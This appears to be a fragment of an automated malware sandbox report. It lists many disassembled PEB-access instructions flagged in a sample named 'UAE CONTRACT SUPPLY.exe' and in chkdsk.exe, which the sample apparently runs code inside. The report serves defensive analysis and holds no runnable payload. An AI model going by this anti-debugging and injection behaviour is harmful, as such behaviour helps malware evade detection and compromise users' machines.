      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E54A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E578DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E554257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E595BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E582073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00562CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564FBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05763D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0573A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05768DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
